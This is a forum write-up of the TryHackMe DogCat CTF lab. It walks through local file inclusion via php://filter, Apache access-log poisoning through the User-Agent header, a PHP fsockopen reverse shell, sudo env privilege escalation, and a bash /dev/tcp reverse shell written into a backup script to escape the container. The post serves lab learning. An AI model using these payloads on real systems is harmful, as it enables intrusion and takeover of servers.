THM | DogCat WriteUp

MaliciousX

Katılımcı Üye
16 Kas 2019
284
49
10
Nikomedya
mj1rbea.png


Welcome THT family, in this thread, I am going to explain the solving process of the DogCat machine on the TryHackMe website.

This CTF is based on LFI exploit so to understand better you should check some LFI threads in the forum.

First, we begin with a Nmap scan.


nmap -sS -sV MachineIP

fubxe3l.PNG


We can see that ports numbered 80 and 20 are open. Since there is a port numbered 80, the machine owns a website so we enter that by typing: http://MachineIP

Looking at the URL, we see that the page is running a PHP that displays the images stored in the dog/ or cat/ folder, passing the "dog" or "cat" value to the "view" variable.


http://MachineIP/?view=dog

We try some simple LFI parameters to check if we can view /etc/passwd with the req URL for example like this:

http://MachineIP/?view=../../../../../../../etc/passwd

Access Denied.

I am typing Php LFI Filter to Google, we will try the parameter given on this site and base64 encode it

http://MachineIP/?view=php://filter/convert.base64-encode/resource=dog

It gave us something encoded by base64.

i1oytn5.PNG


Let's see the content of the text that is given to us by decoding it.

av4i3ja.PNG


Here we see that we can also check the source of the index.php file with the help of the directory transfer.
The important point here is that the file extension allows us to pass an "ext" variable.



Now we are checking if we can read the /etc/passwd file with the following request.


The method we tried worked!

27826io.PNG


Now, we can find the log file that logs all our requests. After some research, we find the server's logs in the file /var/log/apache2/access.log. We see our latest request there.

6a69mz0.PNG


We see that the log saves us as a Mozilla Firefox user. So we are checking if we can inject a PHP code into our User-agent header that is going to be running with the main PHP file. We can use burp suite Repeater to test this again and again. I'm trying by typing TurkHackTeam.

mpxvk4b.PNG

We are victorious! We can inject PHP by User-agent.

Now that we know we can run any code, let's open a reverse shell and infiltrate it through the system.

We start our terminal nc -lvnp 4444(you can type any number you want) we can now sniff the requests coming to our network.

We go to Pentest Monkey or any reverse shell website and look at PHP reverse shell.

MachineIP/?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=php -r '$sock=fsockopen("YourIPAddress",theportyousniff);exec("/bin/bash -i <&3 >&3 2>&3");'

After this, we are now in the system :) I will show the rest of this part through the terminal commands.

#Let's find what CTF wants!

Now we are in the system. By typing 'ls' we are viewing which files are in the part we entered. We reach our goal by typing cat flag.php into the terminal.​
Kod:
www-data@5ab1679239ec:/var/www/html$ ls
ls
cat.php
cats
dog.php
dogs
flag.php
index.php
style.css
test.php

Via typing cd.. to the terminal, we go up in the path ladder and we run 'ls' again.
Kod:
www-data@5ab1679239ec:/var/www$ ls
ls
flag2_QMW7JvaY2LvK.txt
html

Our 3rd target is in the /root folder, we need to upgrade our permissions to get it. We type sudo -l, it shows us that we can run the “/usr/bin/env” command as root without a password. We increase our authority, enter the root folder and our 3rd goal is now all we have to do is write cat flag3.txt to the terminal.
Kod:
www-data@5ab1679239ec:/var/www$ sudo /usr/bin/env /bin/bash
sudo /usr/bin/env /bin/bash
whoami
root

cd /root
ls
flag3.txt

The fourth flag is out of this box. You can check this by scanning the “/opt/backups” backup archive.
For our last target, we need to start a reverse shell again.​

Kod:
echo "#!/bin/bash" > backup.sh
echo "/bin/bash -c 'bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1234 0>&1'" >> backup.sh


Kod:
root@dogcat:~# ls
ls
container
flag4.txt
#CTF Answers

nkrywhi.PNG
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.